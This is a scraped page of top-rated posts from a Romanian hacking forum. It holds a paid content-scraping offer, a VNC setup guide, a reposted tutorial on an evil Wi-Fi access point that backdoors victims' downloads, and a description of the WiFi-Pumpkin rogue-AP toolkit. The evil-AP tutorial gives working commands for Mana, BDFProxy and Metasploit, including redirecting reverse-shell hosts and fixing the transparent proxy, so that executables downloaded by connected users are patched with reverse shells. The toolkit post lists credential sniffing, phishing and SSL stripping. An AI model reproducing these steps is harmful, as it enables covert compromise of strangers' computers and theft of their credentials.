Jump to content

Leaderboard

Popular Content

Showing content with the highest reputation on 10/09/16 in all areas

  1. Salut fac script-uri pentru copiat articole de pe orice site-uri pe wordpress.Copiez doar pe wordpress, deoarece cunosc doar functiile de implementare in wordpress si nu prea am timp sa invat sa implementez si pe alte platforme (nu implementez pe ecommerce). Script-ul il fac in php cu crawlere, alaturi de mysql. Se va forma o baza de date cu toate articolele copiat pentru a nu copia acelasi articol de mai multe ori. Daca site-ul respectiv contine tag-uri,categorii,imagini,text etc. atunci eu copiez tot exact cum este sau la specificatiile clientului.Nu pot eu sa fac script-ul pentru categorii daca site-ul respectiv nu are categorii sau tag-uri. Script-ul se va activa se cate ori vrea clientul pe zi,ora,saptamana,luna etc.Poate copia cate articole doreste clientul fara nici o limita.(lucrul acest il fac cu cronjobs) Daca site-ul respectiv are cloudflare ( https://www.google.ro/search?q=ce+inseamna+cloudflare ) nu pot sa fac nimic deoarece nu detin cunostintele necesare sa trec de protectie, iar protectia nu ma lasa sa folosesc script-ul. Daca doriti sa copiati multe articole de pe un site fara sa miscati un deget atunci script-ul meu este solutia. Script-ul copiaza articole de pe un singur site!Pentru fiecare site va fi un script diferit. Pret : 25$ / site .
    1 point
  2. Acest tutorial va ajuta sa configurati VNC Server gratis pe Ubuntu 14.04 cu software-ul VNC software, TightVNC. 1: Instalm componentele Avem nevoie de urmatoarele componentele pentru a configura un VNC Server corect. xOrg Un desktop (LXDE) Ubuntu VNC server (TightVNC) sudo apt-get install xorg lxde-core tightvncserver 2: Configurare VNC Configuram VNC si vom alege o parola pentru vnc server cu care ne vom conecta. This password is limited to 8 characters in length. Longer passwords will be truncated tightvncserver :1 Next, vom modifica fisierul config din /root/.vnc/ deoarece VNC nu stie ca trebuie sa porneasca Desktop-ul LXDE nano ~/.vnc/xstartup Si acuma modificam Stergem # inainte de #x-window-manager & Adaugam linia lxterminal & Adaugam linia /usr/bin/lxsession -s LXDE & Fisierul config acuma ar trebui sa arate : #!/bin/sh xrdb $HOME/.Xresources xsetroot -solid grey #x-terminal-emulator -geometry 80x24+10+10 -ls -title "$VNCDESKTOP Desktop" & x-window-manager & lxterminal & /usr/bin/lxsession -s LXDE & # Fix to make GNOME work export XKL_XMODMAP_DISABLE=1 /etc/X11/Xsession Salvam fisierul cu Ctrl + O si iesim din NANO cu Ctrl + X 3: Restart VNC Ca sa restartam VNC-ul trebuie sa-l inchidem cu: tightvncserver -kill :1 Si sa-l pornim din nou cu: vncserver :1 -geometry 1024x768 -depth 16 -pixelformat rgb565 4: Conecteaza-te la noul tau VNC Server Pentru a te contecta la VNC Server ai nevoie de un VNC Client, recomand VNC Viewer. Acuma te poti conecta cu ip-ul de la server si portul :1 (exemplu:192.168.1.1:1) si folosesti parola de la punctul 3. Eu am avut nevoie de VNC Server pentru aplicatia Hitleap.
    1 point
  3. Manca-te-ar ciuma cu scannerul tau cu tot
    1 point
  4. Te pot ajuta cu un sut in fund, vrei?
    1 point
  5. EVIL ACCESS POINT WITH AUTO-BACKDOORING FTW! This post is about setting up an evil access point that will automatically backdoor executables that connected users download. Pretty neat, right? This tutorial is inspired by muts' NetHunter video of BDFProxy on NetHunter. I am using Kali NetHunter 2.0 running from a Nexus 9. I am using a TP-LINK TLWN722N (the 150Mbps version) as my secondary network interface. I recently purchased a Nexus 9 tablet and decided to load it up with Kali NetHunter. NetHunter is a release of Kali made specifically for hackers on-the-go. It’s packed with lots of cool stuff like one-click scripts, HID Keyboard attack capabilities plus a bunch of the tools that Kali desktop comes with. Tools A few tools I will be using: Mana – Rouge Access Point toolkit. It implements a more advanced version of the Karma attack. The most notable improvement is Mana responds to other AP broadcasts instead of device probes like Karma, but still with the end goal of tricking victims into connecting to the AP you own. Plus, it includes lots of other neat evil AP tricks that are baked right in. For more info on Mana I’d recommend watching the Defcon 22 talk where the tool was release here. BackdoorFactory BDFProxy – Automatically patches binaries with malicious payloads on the fly via MITM. False Start Since I want to also provide victims with Internet access so I can backdoor their downloads I will need another Wi-Fi interface on my Nexus 9. I ended up going with the TP-LINK TLWN722N because of its low power usage and its compatibility with Kali (supports packet injection). I launched the Kali NetHunter menu and saw a promising looking menu item: Kali NetHunter comes with Mana already installed and ready to go, or so I thought. Chances are I was doing something wrong, but I was not able to get the built-in one click launcher working out of the box. It even contained a screen for bdfproxy.cfg! When I started it there was even the option to start with bdf: But no dice. Even after correcting my upstream device from eth0 to wlan1 and double checking the dhcpd settings in the config file I couldn’t get the thing to run. I couldn't seem to find the output of either Mana or BDFProxy in the logs either. Setting Up So, off to the terminal! Home sweet home. I went into the Mana folder and skulked around a little bit: cd /usr/share/mana-toolkit/run-mana ls –lah Aha! The start-nat-simple-bdf-lollipop.sh looks promising. Let’s have a look: Everything looks pretty straightforward actually, which was pleasantly surprising. I never know what to expect with new tools. We assign some variables for devices, enable forwarding, start an access point and DHCP, monkey with the iptables and off we go. The only thing that stumped me at first was the “# Add fking rule to table 1006”. There are some config files mentioned in there. Let’s make sure they are set up properly. First stop is /etc/mana-toolkit/hostapd-karma.confg: Next let’s look at /etc/mana-toolkit/dhcpd.conf: Looks like we’re using Google for DNS and putting our clients on the 10.0.0.0/24 range. Cool beans. Let’s also take a look at the BDFProxy config file at /etc/bdfproxy/bdfproxy.cfg (config file below truncated to the important parts): Looks like there is something slightly off here. The IPs configured for our reverse shells (192.168.1.168 and 192.168.1.16) need to point back to us. According to our dhcpd.conf settings we're going to use the current settings aren't correct. We will be the router IP named in dhcpd.conf, so we need to change bdfproxy.cfg accordingly by setting all the HOSTs to point to us at 10.0.0.1. Quick replace with sed: sed –i 's/192.168.1.168/10.0.0.1/g' bdfproxy.cfg sed –I 's/192.168.1.16/10.0.0.1/g' bdfproxy.cfg The diffs: Starting up the Machine Ok, so it’s time to start Mana up: cd /usr/share/mana-toolkit/run-mana ./start-nat-simple-bdf-lollipop.sh In a new terminal we start BDFProxy up: cd /etc/bdfproxy/ ./bdfproxy Now that BDFProxy is up it has created a Metasploit resource file. It wasn’t entirely obvious at first where this file lived (it is not in /etc/bdfproxy/). It turns out the file is here: /usr/share/bdfproxy/bdfproxy_msf_resource.rc That resource file will help handle reverse shells. Time to open another terminal, navigate there and start up Metasploit: cd /usr/share/bdfproxy service postresql start cat bdf_msf_resource.rc #sanity check of conents, make sure IP update took msfconsole –r bdfproxy_msf_resource.rc After Metasploit is fired up we can see the resource file has loaded: Sweetness. Here is where I got stuck for a little bit. It appeared everything is set up and working properly. Mana was creating APs and I could connect and get back out to the internet. Iptables set up by Mana are correctly forwarding my traffic from port 80 to 8080 where BDFProxy is waiting. The problem is BDFProxy is failing to transparently proxy connections (mitmproxy underneath is actually failing). I got this error on all HTTP connections from my laptop test machine connected to the evil AP: HttpError('Invalid HTTP request form (expected: absolute, got: relative)',) It turns out I missed changing one of the default bdfproxy.cfg settings. The line transparentProxy = NoneNeeds to be changed to: transparentProxy = transparentAfter that BDFProxy was able to successfully backdoor executables. I connected to the AP with my laptop and download a file over http. I downloaded Audacity, and also tested with downloading Putty and PSFTP. Once BDFProxy gets its hooks in the backdoor is dropped in place: Here is the part that blew me away: executables within zips are backdoored, all done on the fly. How cool is that? For executable formats it not only works for Windows exe/PEs, but it does Linux ELF and Mach-O (that means you OSX!). Very cool stuff. - UPDATE 11/29/15: I've added some more content about BDFProxy in a new post here. 19 NOVEMBER 2015 Sursa: http://decidedlygray.com/2015/11/19/evil-access-point-with-auto-backdooring-ftw/
    1 point
  6. Ceva asemanator si aici,contine cam tot ce ai nevoie pentru MiTM : WiFi-Pumpkin Framework for Rogue Wi-Fi Access Point Attack Description WiFi-Pumpkin is a open source security tool that provides the Rogue access point to Man-In-The-Middle and network attacks. Installation Kali 2.0/WifiSlax 4.11.1/Parrot 3.0.1/2.0.5 Python 2.7 git clone https://github.com/P0cL4bs/WiFi-Pumpkin.git cd WiFi-Pumpkin ./installer.sh --install refer to the wiki for Installation Features Rogue Wi-Fi Access Point Deauth Attack Clients AP Probe Request Monitor DHCP Starvation Attack Credentials Monitor Transparent Proxy Windows Update Attack Phishing Manager Partial Bypass HSTS protocol Support beef hook Mac Changer ARP Poison DNS Spoof Patch Binaries via MITM Plugins Plugin Description net-creds Sniff passwords and hashes from an interface or pcap file dns2proxy This tools offer a different features for post-explotation once you change the DNS server to a Victim. sslstrip2 Sslstrip is a MITM tool that implements Moxie Marlinspike's SSL stripping attacks based version fork @LeonardoNve/@xtr4nge. sergio-proxy Sergio Proxy (a Super Effective Recorder of Gathered Inputs and Outputs) is an HTTP proxy that was written in Python for the Twisted framework. BDFProxy-ng Patch Binaries via MITM: BackdoorFactory + mitmProxy, bdfproxy-ng is a fork and review of the original BDFProxy @secretsquirrel. Transparent Proxy Transparent proxies that you can use to intercept and manipulate HTTP/HTTPS traffic modifying requests and responses, that allow to inject javascripts into the targets visited. You can easily implement a module to inject data into pages creating a python file in directory "Proxy" automatically will be listed on PumpProxy tab. Plugins Example The following is a sample module that injects some contents into the tag to set blur filter into body html page: import logging from Plugin import PluginProxy from Core.Utils import setup_logger class blurpage(PluginProxy): ''' this module proxy set blur into body page html response''' _name = 'blur_page' _activated = False _instance = None _requiresArgs = False @staticmethod def getInstance(): if blurpage._instance is None: blurpage._instance = blurpage() return blurpage._instance def __init__(self): self.injection_code = [] def LoggerInjector(self,session): setup_logger('injectionPage', './Logs/AccessPoint/injectionPage.log',session) self.logging = logging.getLogger('injectionPage') def setInjectionCode(self, code,session): self.injection_code.append(code) self.LoggerInjector(session) def inject(self, data, url): injection_code = '''<head> <style type="text/css"> body{ filter: blur(2px); -webkit-filter: blur(2px);} </style>''' self.logging.info("Injected: %s" % (url)) return data.replace('<head>',injection_code ) Screenshots Screenshot on the wiki FAQ FAQ on the wiki Contact Us Whether you want to report a bug, send a patch or give some suggestions on this project, drop us or open pull requests Happy MITM!
    1 point
  7. @Zatarra si unicornii
    1 point
  8. Salut , ma puteti ajuta si pe mine cu o eroare ? scanning network 128.*.*.* usec: 0, burst packets 65535 using inteface eth0 ERROR: UID != 0 asta imi da ... Multumesc !
    -1 points
×
×
  • Create New...